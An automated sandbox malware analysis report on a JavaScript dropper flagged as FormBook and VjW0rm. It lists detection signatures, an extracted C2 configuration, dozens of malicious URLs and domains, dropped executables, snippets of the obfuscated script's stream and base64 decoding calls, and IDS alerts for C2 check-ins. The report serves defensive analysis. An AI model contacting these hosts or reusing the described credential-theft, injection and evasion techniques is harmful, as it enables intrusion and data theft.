Windows Analysis Report
CIQ-PO162667.js

Overview

General Information

Sample Name: CIQ-PO162667.js
Analysis ID: 635232
MD5: 3d6bfb78b4507146f160b706604da6f9
SHA1: 9c189911fb19625c1f9418096fb8b5c65b1d34e9
SHA256: b92b2c3a689cd2c5929f4123642004b7f23482c036dbf467813a18c91b3537df
Tags: jsVjw0rm
Infos:

Detection

FormBook, VjW0rm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected VjW0rm
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Wscript called in batch mode (surpress errors)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Maps a DLL or memory area into another process
Creates multiple autostart registry keys
JavaScript source code contains call to eval containing suspicious API calls
Performs DNS queries to domains with low reputation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Drops script or batch files to the startup folder
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000000.00000003.283279518.000001E33FDAF000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.gafcbooster.com/np8s/"], "decoy": ["segredovideos.online", "kishanshree.com", "mjmvn.com", "44bb44.com", "brawlhallacodestore.com", "littlebeartreeservices.com", "topings33.com", "nachuejooj07.xyz", "waermark.com", "halecamilla.site", "basincreekmedia.com", "resolutionmeasles.com", "interlink-travel.com", "siberup.xyz", "getbusinesscreditandfunding.com", "shcylzc.com", "68chengxinle.com", "jkrsbarmybookarmy.com", "geo-pacificoffshore.com", "refreshertowels.com", "localbloom.online", "brandingaloha.com", "84866.xyz", "salondutaxi.com", "harmlett.com", "angelmatic.net", "o7oiwlp.xyz", "thepowerofanopenquestion.com", "tokenascent.com", "udrivestorage.com", "hengyuejiguang.com", "minotaur.network", "ratebill.com", "18w99.com", "2264a.com", "tentanguang.online", "muddybootslife.com", "vitality-patients.online", "heavymettlelawyers.com", "spxtokensales.com", "titair.com", "lazarusnatura.com", "rasheedabossmoves.com", "medyumgalip.com", "liveafunday.xyz", "xn--wsthof-camping-gsb.com", "xfd8asvtivg944.xyz", "myhvn.site", "964061.com", "screeshot.com", "mysbaally.com", "connectfamily.loan", "langlev.com", "labsreports-menalab.com", "gabefancher.com", "jdhwh2nbiw234.com", "pdwfifi.com", "losangelesrentalz.com", "brandpay.xyz", "jlbwaterdamagerepairseattle.com", "wps-mtb.com", "sekolahkejepang.com", "saastainability.com", "multiverseofbooks.com"]}
Multi AV Scanner detection for submitted file
Source: CIQ-PO162667.js Virustotal: Detection: 25% Perma Link
Source: CIQ-PO162667.js ReversingLabs: Detection: 21%
Yara detected FormBook
Source: Yara match File source: 2.2.bin.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.283279518.000001E33FDAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.368626097.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.441172214.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.817738228.0000000005407000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.787729752.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.781550005.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.283050957.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806764391.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.397676948.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.440060149.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.780941454.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.780550493.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.286506040.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.441024809.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806738334.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.293804379.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.283509737.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.284654374.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806579092.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.781223568.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.298399545.000001E34090B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe, type: DROPPED
Antivirus detection for URL or domain
Source: http://dilshadkhan.duia.ro:6670/Vredir=C: Avira URL Cloud: Label: malware
Source: http://www.ratebill.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZXBsYWNl Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreMjo Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZXBsYWNlrr Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre1dG Avira URL Cloud: Label: malware
Source: http://www.o7oiwlp.xyz/np8s/?c2MH6DeP=Wi2RbeLHGdcMG/4zbWZrHjxVNTurLVF13zSFjScR2hfe23jELpoygCvTVMXCwbd5YdLw&hFQL=JXUhrvXxUhF4 Avira URL Cloud: Label: phishing
Source: http://dilshadkhan.duia.ro:6670/VreIER=Intel64 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreKTsNClZO Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre?9 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrenter2oft6 Avira URL Cloud: Label: malware
Source: http://www.interlink-travel.com/np8s/?c2MH6DeP=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC76K0hST926FmxCw4JGrgecy53rLpUaVG&hFQL=JXUhrvXxUhF4 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrerwl Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreo Avira URL Cloud: Label: malware
Source: http://www.heavymettlelawyers.com/np8s/?c2MH6DeP=sGHpREHB6zr3UC4aQViiUpNRv9hYNnMtmn0rCl8QdyZ+urDz6JFWhhwh7EVf+dC28syJ&hFQL=JXUhrvXxUhF4 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreDENTIFIER=Intel64 Avira URL Cloud: Label: malware
Source: www.gafcbooster.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrebWcgPSAi Avira URL Cloud: Label: malware
Source: http://www.rasheedabossmoves.com/np8s/ Avira URL Cloud: Label: malware
Source: http://www.interlink-travel.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre$_& Avira URL Cloud: Label: malware
Source: http://www.topings33.com/np8s/?c2MH6DeP=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&hFQL=JXUhrvXxUhF4 Avira URL Cloud: Label: malware
Source: http://www.2264a.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre783C6-CB41-11D1-8B02-00600806D9B6 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZ Avira URL Cloud: Label: malware
Source: http://www.brandpay.xyz/np8s/?c2MH6DeP=hgAcLcCQcJ9fw2P/Tuk0sK1oy/IuL6u1zsG1wPPsT2rq6CikgixxXMntvJFJ21PsUjiZ&hFQL=JXUhrvXxUhF4 Avira URL Cloud: Label: phishing
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.d Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre2a Avira URL Cloud: Label: malware
Source: http://www.rasheedabossmoves.com/np8s/?c2MH6DeP=pvCvVC1srqMzTu3vjZ/Pi4S7puQ7WYlroZs2vwEH9SE4BkgUF4SEMyF7QpXUX37idvZ6&hFQL=JXUhrvXxUhF4 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-100 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZigpIHsNrr Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro/sers Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreE-8C82-00AA004BA90B Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreN Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre._8 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreYXIgaXQg Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreoftows Avira URL Cloud: Label: malware
Source: http://www.2264a.com/np8s/?c2MH6DeP=SaZV+ETfGqRGg8UpLQ9gT5lpaRa7t1Wyj9mLK06zGilC1KjP8kiErJAXediVB/P9DJGG&hFQL=JXUhrvXxUhF4 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreM Avira URL Cloud: Label: malware
Source: http://www.brawlhallacodestore.com/np8s/?c2MH6DeP=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgPTE4uOj94VU&hFQL=JXUhrvXxUhF4 Avira URL Cloud: Label: malware
Source: http://www.topings33.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreI Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrePSAiQ2wi Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreA2 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrelderViewDual2WWW Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreMrf_ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre7 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreMTf Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreV2 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZ6 Avira URL Cloud: Label: malware
Source: http://www.ratebill.com/np8s/?c2MH6DeP=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkCDKr1q9/u4Y&hFQL=JXUhrvXxUhF4 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre.duia.ro:6670/Vre Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/) Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre0 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrenter2 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre(( Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre_ndefender://%ProgramFiles% Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre- Avira URL Cloud: Label: malware
Source: http://www.o7oiwlp.xyz/np8s/ Avira URL Cloud: Label: phishing
Source: https://www.interlink-travel.com/np8s/?Bl=lHUDzXfpVJ_&c2MH6DeP=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC7 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre$ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.duu Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrerd Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreoKo Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreQa Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreEa Avira URL Cloud: Label: malware
Source: http://www.heavymettlelawyers.com/np8s/ Avira URL Cloud: Label: malware
Source: http://www.interlink-travel.com/np8s/?Bl=lHUDzXfpVJ_&c2MH6DeP=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC76K0hST926FmxCw4JGrgecy53rLpUaVG Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreoH Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrex. Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre02-00600806D9B6 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre%( Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrec& Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vres2 Avira URL Cloud: Label: malware
Source: http://www.o7oiwlp.xyz/np8s/?Bl=lHUDzXfpVJ_&c2MH6DeP=Wi2RbeLHGdcMG/4zbWZrHjxVNTurLVF13zSFjScR2hfe23jELpoygCvTVMXCwbd5YdLw Avira URL Cloud: Label: phishing
Source: http://dilshadkhan.duia.ro:6670/VreZigpIHsN Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: rasheedabossmoves.com Virustotal: Detection: 7% Perma Link
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\bin.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe Metadefender: Detection: 48% Perma Link
Source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\bin.exe Metadefender: Detection: 48% Perma Link
Source: C:\Users\user\AppData\Local\Temp\bin.exe ReversingLabs: Detection: 100%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bin.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 40.0.5hol_r7nkdhp.exe.c50000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.bin.exe.b0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 40.0.5hol_r7nkdhp.exe.c50000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.bin.exe.b0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 40.0.5hol_r7nkdhp.exe.c50000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 40.0.5hol_r7nkdhp.exe.c50000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: Binary string: cmmon32.pdb source: bin.exe, 00000002.00000002.444497879.0000000003790000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: bin.exe, 00000002.00000002.444497879.0000000003790000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: bin.exe, 00000002.00000003.287029709.000000000163B000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.283814480.000000000149D000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.441378335.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.441685215.00000000018EF000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000003.441045489.0000000004D33000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000002.808288523.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000003.439635853.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000002.808473944.0000000004FEF000.00000040.00000800.00020000.00000000.sdmp, 5hol_r7nkdhp.exe, 00000028.00000003.781887430.0000000001100000.00000004.00000800.00020000.00000000.sdmp, 5hol_r7nkdhp.exe, 00000028.00000003.783460088.0000000001290000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bin.exe, bin.exe, 00000002.00000003.287029709.000000000163B000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.283814480.000000000149D000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.441378335.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.441685215.00000000018EF000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000012.00000003.441045489.0000000004D33000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000002.808288523.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000003.439635853.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000002.808473944.0000000004FEF000.00000040.00000800.00020000.00000000.sdmp, 5hol_r7nkdhp.exe, 00000028.00000003.781887430.0000000001100000.00000004.00000800.00020000.00000000.sdmp, 5hol_r7nkdhp.exe, 00000028.00000003.783460088.0000000001290000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032F1660 FindFirstFileW,FindNextFileW,FindClose, 18_2_032F1660
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032F1659 FindFirstFileW,FindNextFileW,FindClose, 18_2_032F1659
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior

Software Vulnerabilities
barindex
JavaScript source code contains functionality to generate code involving a shell, file or stream
Source: CIQ-PO162667.js Argument value : ['gYMty,WSH.CreateObject("adodb.stream")', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty","WSH.CreateObject("adodb.stream")"'] Go to definition
Source: CIQ-PO162667.js Argument value : ['gYMty,WSH.CreateObject("adodb.stream")', '"gYMty=WSH.CreateObject("adodb.stream")"', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty=","WSH.CreateObject("adodb.stream")",-426', '"gYMty","WSH.CreateObject("adodb.stream")"'] Go to definition
Source: CIQ-PO162667.js Argument value : ['gYMty,WSH.CreateObject("adodb.stream")', '"gYMty=WSH.CreateObject("adodb.stream")"', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty=","WSH.CreateObject("adodb.stream")",-426', '"gYMty","WSH.CreateObject("adodb.stream")"'] Go to definition
JavaScript source code contains call to eval containing suspicious API calls
Source: CIQ-PO162667.js Argument value: ['"gYMty=WSH.CreateObject("adodb.stream")"', '"var H3br3w=WSH.CreateObject("microsoft.xmldom").createElement("mko")"'] Go to definition

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.ratebill.com
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.topings33.com
Source: C:\Windows\explorer.exe Network Connect: 104.21.4.45 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 85.159.66.93 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.interlink-travel.com
Source: C:\Windows\explorer.exe Domain query: www.2264a.com
Source: C:\Windows\explorer.exe Domain query: www.rasheedabossmoves.com
Source: C:\Windows\explorer.exe Network Connect: 134.122.201.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.siberup.xyz
Source: C:\Windows\explorer.exe Network Connect: 137.220.133.198 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.brandpay.xyz
Source: C:\Windows\explorer.exe Network Connect: 172.96.186.204 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.liveafunday.xyz
Source: C:\Windows\explorer.exe Domain query: www.thepowerofanopenquestion.com
Source: C:\Windows\explorer.exe Network Connect: 154.220.100.142 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Domain query: dilshadkhan.duia.ro
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.kishanshree.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.230.89 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.jdhwh2nbiw234.com
Source: C:\Windows\explorer.exe Network Connect: 132.148.165.111 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 52.17.85.125 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.brawlhallacodestore.com
Source: C:\Windows\explorer.exe Domain query: www.heavymettlelawyers.com
Source: C:\Windows\explorer.exe Domain query: www.o7oiwlp.xyz
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Network Connect: 91.193.75.133 6670 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.gafcbooster.com
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49800 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49800 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49800 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 172.96.186.204:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 172.96.186.204:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 172.96.186.204:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49831 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49831 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49831 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49838 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49838 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49838 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49845 -> 134.122.201.217:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49845 -> 134.122.201.217:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49845 -> 134.122.201.217:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49933 -> 154.220.100.142:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49933 -> 154.220.100.142:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49933 -> 154.220.100.142:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49937 -> 154.220.100.142:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49937 -> 154.220.100.142:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49937 -> 154.220.100.142:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49944 -> 134.122.201.217:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49944 -> 134.122.201.217:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49944 -> 134.122.201.217:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49953 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49953 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49953 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49957 -> 172.96.186.204:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49957 -> 172.96.186.204:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49957 -> 172.96.186.204:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49963 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49963 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49963 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49968 -> 134.122.201.217:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49968 -> 134.122.201.217:80
